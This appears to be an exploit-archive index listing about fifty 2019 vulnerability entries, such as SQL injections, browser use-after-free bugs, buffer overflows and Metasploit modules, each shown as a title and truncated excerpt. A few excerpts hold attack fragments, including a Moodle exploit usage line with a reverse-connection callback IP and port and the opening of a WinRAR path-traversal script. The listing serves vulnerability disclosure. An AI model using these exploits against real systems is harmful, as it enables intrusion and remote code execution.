Meeplace Business Review Script SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Meeplace Business Review Script - 'id' SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: http://www.meeplace.com Demo Site: http://demo.meeplace.com Version: Latest Tested on: Kali Linux CVE: N/A ----- PoC: SQLi...
VMware Workstation 14.1.5 / VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege
The VMX process vmware-vmx.exe process configures and hosts an instance of VM. As is common with desktop virtualization platforms the VM host usually has privileged access into the OS such as mapping physical memory which represents a security risk. To mitigate this the VMX process is created wit...
TCPDF 6.2.19 Deserialization / Remote Code Execution Exploit
TCPDF versions 6.2.19 and below suffer from a deserialization vulnerability that can allow for remote code execution. CVE-2018-17057: phar deserialization in TCPDF might lead to RCE --------------------------------------------------------------- Affected products ================= TCPDF While it ...
Canarytokens 2019-03-01 - Detection Bypass Exploit
Exploit Title: Canarytokens 2019-03-01 - Detection Bypass Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale Vendor Homepage: https://thinkst.com/ Version: up to 2019-03-01 Software Link: https://github.com/thinkst/canarytokens Google Dork: N/A CVE: 2019-9768...
Rails 5.2.1 - Arbitrary File Content Disclosure Exploit
Exploit for multiple platform in category web applications ''' Exploit Title: File Content Disclosure on Rails Date: CVE disclosed 3/16 today's date is 3/20 Exploit Author: NotoriousRebel Vendor Homepage: https://rubyonrails.org/ Software Link: https://github.com/rails/rails Version: Versions...
snap - seccomp Blacklist for TIOCSTI can be Circumvented Exploit
snap uses a seccomp filter to prevent the use of the TIOCSTI ioctl; in the source code, this filter is expressed as follows: # TIOCSTI allows for faking input (man tty_ioctl) # TODO: this should be scaled back even more ioctl - !TIOCSTI In the X86-64 version of the compiled seccomp filter, this result...
DVD X Player 5.5.3 - .plf Buffer Overflow Exploit
Exploit for windows platform in category local exploits #!/usr/bin/env python Exploit Title: DVD X Player 5.5.3 Buffer Overflow Date: 20.03.2019 Exploit Author: Paolo Perego - email protected Vendor Homepage: http://www.dvd-x-player.com Software Link:...
uHotelBooking System - system_page SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: uHotelBooking System - 'system_page' SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.hotel-booking-script.com Demo Site: https://www.hotel-booking-script.com/demo/ Version: Latest Tested on: Kali Lin...
The Company Business Website CMS - Multiple Vulnerabilities
Exploit for php platform in category web applications Exploit Title: The Company Business Website CMS - 'username' SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms Demo Site: http://thecompany.morkocbilisim.com...
NSS Netscape Certificate Sequences CERT_DecodeCertPackage() Crash Vulnerability
NSS suffers from a NULL dereference issue when parsing Netscape Certificate Sequences in CERT_DecodeCertPackage. nss: CERT_DecodeCertPackage crash with Netscape Certificate Sequences I noticed that the main entrypoint for decoding DER blobs in NSS, CERT_DecodeCertPackage, actually handles multiple...
JFrog Artifactory Administrator Authentication Bypass Exploit
JFrog Artifactory versions prior to 6.8.7 suffer from an administrative access bypass vulnerability due to relying on an X-Forwarded-For header. JFrog Artifactory Administrator Authentication Bypass Introduction ============ JFrog Artifactory https://jfrog.com/artifactory/ is a popular universal...
Netartmedia PHP Dating Site - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Php Dating Site - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/datingsite/ Demo Site: https://www.phpscriptdemos.com/dating/ Version: Latest Tested on: Kali Linux CVE:...
NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow Vendor Homepage: http://netsharewatcher.nsauditor.com Software Link: http://netsharewatcher.nsauditor.com/downloads/NetShareWatchersetup.exe Exploit Author: Peyman Forouzan Tested...
Netartmedia PHP Business Directory 4.2 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia PHP Business Directory 4.2 - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.phpbusinessdirectory.com/ Demo Site: https://www.bizwebdirectory.com/ Version: 4.2 Tested on: Kali Linux CVE:...
Netartmedia Deals Portal - Email SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Deals Portal - 'Email' SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/dealsportal/ Demo Site: https://www.phpscriptdemos.com/deals/i Version: Latest Tested on: Kali Linu...
PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control Exploit
Exploit for hardware platform in category web applications Exploit Title: PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control Exploit Author: Kumar Saurav Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/ Vendor: ChinaMobile...
Netartmedia Vlog System - email SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Vlog System - 'email' SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/vlogsystem/ Demo Site: https://www.phpscriptdemos.com/vlogs/ Version: Latest Tested on: Kali Linux...
Netartmedia PHP Mall 4.1 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia PHP Mall 4.1 - Multiple SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/mall/ Demo Site: https://www.phpscriptdemos.com/mall/ Version: 4.1 Tested on: Kali Linux CVE: N/A...
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery Exploit
Exploit for hardware platform in category web applications Exploit Title: PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery (CSRF) Exploit Author: Kumar Saurav Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/ Vendo...
Netartmedia PHP Car Dealer - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia PHP Car Dealer - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/autodealer/ Demo Site: https://www.phpscriptdemos.com/autodealer/ Version: Latest Tested on: Kali Linux CV...
Netartmedia PHP Real Estate Agency 4.0 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/propertyagency/ Demo Site: https://www.phpscriptdemos.com/agency/ Version: 4.0 Tested on: Kali...
202CMS v10beta - Multiple SQL Injection Vulnerabilities
Exploit for php platform in category web applications =========================================================================================== Exploit Title: 202CMS - 'loguser' SQL Inj. Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://sourceforge.net/projects/b202cms/ Software Link:...
Advanced Host Monitor 11.92 beta - Local Buffer Overflow Exploit
Exploit for windows platform in category local exploits #!/usr/bin/env python ------------------------------------------------------------------------------------------------------------------------------------ Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow EggHunter Date:...
eNdonesia Portal 8.7 - Multiple Vulnerabilities
Exploit for php platform in category web applications =========================================================================================== Exploit Title: eNdonesia Portal 'banners.php' SQL Inj. Dork: N/A Date: 19-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage:...
Gila CMS 1.9.1 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Gila CMS search Cross Site Scripting Google Dork: intext:"Powered By Gila CMS" Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://gilacms.com Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip Demo Sit...
Google Chrome < M73 - MidiManagerWin Use-After-Free Exploit
Google Chrome < M73 - MidiManagerWin Use-After-Free Exploit MidiManagerWin uses a similar instance_id mechanism to the TaskService implementation to ensure that delayed tasks are only executed if the MidiManager instance that they were scheduled on is still alive. However, this instance_id is an int,...
Microsoft VBScript - VbsErase Memory Corruption Exploit
r eax=0000600c ebx=05dc10dc ecx=00000000 edx=00000000 esi=13371337 edi=05c5ca44 eip=6e0fc9fa esp=05c5ca28 ebp=05c5ca48 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 VBSCRIPT!VbsErase+0x5a: 6e0fc9fa 8b3e mov edi,dword ptr [esi] ds:002b:13371337=????????...
Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject Exploit
Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject Exploit Attached is a PoC file that bypasses Flash click2play in Microsoft Edge. This was tested on Windows 10 64bit v 1809 with the latest patches applied. The PoC currently loads a swf from wwwimages.adobe.com...
exacqVision 9.8 Unquoted Service Path Privilege Escalation Vulnerability
exacqVision version 9.8 suffers from an unquoted search path issue impacting the services exacqVisionServer, dvrdhcpserver and mdnsresponder for Windows deployed as part of exacqVision software application. This could potentially allow an authorized but non-privileged local user to execute...
Netartmedia Real Estate Portal 5.0 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/realestate/ Demo Site: https://www.phpscriptdemos.com/realestate/ Versio...
libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons Exploit
When libseccomp compiles filters for 64-bit systems, it needs to split 64-bit comparisons into 32-bit comparisons because classic BPF can't operate on 64-bit values directly. libseccomp offers both bitwise comparisons NE, EQ, MASKEDEQ and arithmetic comparisons LT, LE, GE, GT. Bitwise comparisons...
Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML Exploit
!-- Windows: Windows: IE11 VBScript execution policy bypass in MSHTML Platform: Windows 10 1809 not tested earlier Class: Security Feature Bypass Summary: MSHTML only checks for the CLSID associated with VBScript when blocking in the Internet Zone, but doesn’t check other VBScript CLSIDs which...
Google Chrome < M73 - Double-Destruction Race in StoragePartitionService Exploit
Google Chrome < M73 - Double-Destruction Race in StoragePartitionService There's a race condition in the destruction of the BindingState for bindings to the StoragePartitionService. It looks like the root cause of the issue is that since we can get two concurrent calls to callbacks returned from...
Netartmedia Jobs Portal 6.1 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Jobs Portal 6.1 - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/jobsportal/ Demo Site: https://www.ittjobs.com/ Version: 6.1 Tested on: Kali Linux CVE: N/A ----- PoC SQL...
Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter Exploit
Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter Exploit There appears to be a race condition in the destruction of the ExtensionsGuestViewMessageFilter if the ProcessIdToFilterMap is modified concurrently. See the comment in the code:...
Netartmedia Event Portal 2.0 - Email SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Event Portal 2.0 - 'Email' SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/eventportal/ Demo Site: https://www.phpscriptdemos.com/events/ Version: 2.0...
MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9[at]pm.me Software Link: https://community.mybb.com/mods.php?action=view&pid=1231 Version: 1.32 Tested on: Ubuntu 18.04 CVE:...
Google Chrome < M73 - FileSystemOperationRunner Use-After-Free Exploit
Google Chrome operation OperationID id = next_operation_id_++; // TODO(https://crbug.com/864351): Diagnostic to determine whether OperationID // wrap-around is occurring in the wild. DCHECK(operations_.find(id) == operations_.end()); // ! If id already in operations, this will free operation...
Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE Exploit
This Metasploit module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file. The ACL bypass gadget is specific to Jenkins versions 2.137 and below and will not work on later versions of...
TheCarProject v2 - Multiple SQL Injection Vulnerability
Exploit for php platform in category web applications =========================================================================================== Exploit Title: TheCarProject v2 - 'manid' SQL Inj. Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://thecarproject.org/ Software Link:...
BMC Patrol Agent - Privilege Escalation Cmd Execution Exploit
This Metasploit module leverages the remote command execution feature provided by the BMC Patrol Agent software. It can also be used to escalate privileges on Windows hosts as the software runs as SYSTEM but only verifies that the password of the provided user is correct. This also means if the...
WinRAR 5.61 - Path Traversal Exploit
Exploit for windows platform in category local exploits #!/usr/bin/env python3 import os import re import zlib import binascii The archive filename you want rarfilename = "test.rar" The evil file you want to run evilfilename = "calc.exe" The decompression path you want, such shown below...
BMC Patrol Agent Privilege Escalation / Command Execution Exploit
This Metasploit module leverages the remote command execution feature provided by the BMC Patrol Agent software. It can also be used to escalate privileges on Windows hosts as the software runs as SYSTEM but only verifies that the password of the provided user is correct. This also means if the...
Webmin 1.900 Upload Authenticated Remote Command Execution Exploit
This Metasploit module exploits an arbitrary command execution vulnerability in Webmin 1.900 and lower versions. Any user authorized to the "Upload and Download" module can execute arbitrary commands with root privileges. In addition, if the Running Processes proc privilege is set the user can...
WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit
Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit Date: 16.03.2019 Vendor Homepage: http://www.winavi.com Software Link: http://www.winavi.com/user/download/WinAVIiPod3GPMP4PSPConverter.exe Exploit Author: Achilles Tested Version: 4.4.2 Tested on: Windows XP SP3 EN Windows 7...
Laundry CMS - Multiple Vulnerabilities
Exploit for php platform in category web applications =========================================================================================== Exploit Title: Laundry CMS clothcode SQL Inj. Dork: N/A Date: 09-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: http://laundry.rpcits.co.in/...
Mail Carrier 2.5.1 - MAIL FROM Buffer Overflow Exploit
Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow Exploit Author: Joseph McDonagh Vendor Homepage: N/A Software Link: N/A Version: Mail Carrier 2.5.1 Tested on: Windows Vista Home Basic SP2 CVE: None #!/usr/bin/python This script started from PWK, Chapter 6 I am re-purposing it Tab...
NetData 1.13.0 - HTML Injection Vulnerability
Exploit for multiple platform in category web applications Author: Marcelo Vázquez aka s4vitar NetData v1.13.0 HTML Injection Vulnerability Exploit Title: NetData v1.13.0 HTML Injection Vulnerability Exploit Author: Marcelo Vázquez aka s4vitar Collaborators: Victor Lasa aka vowkin Vendor Homepage...
Moodle 3.4.1 - Remote Code Execution Exploit
Exploit for php platform in category web applications php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the...
ICE HRM 23.0 - Multiple Vulnerabilities
Exploit for php platform in category web applications =========================================================================================== Exploit Title: ICE HRM - 'ob' SQL Inj. Dork: N/A Date: 14-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: http://icehrm.org Software Link:...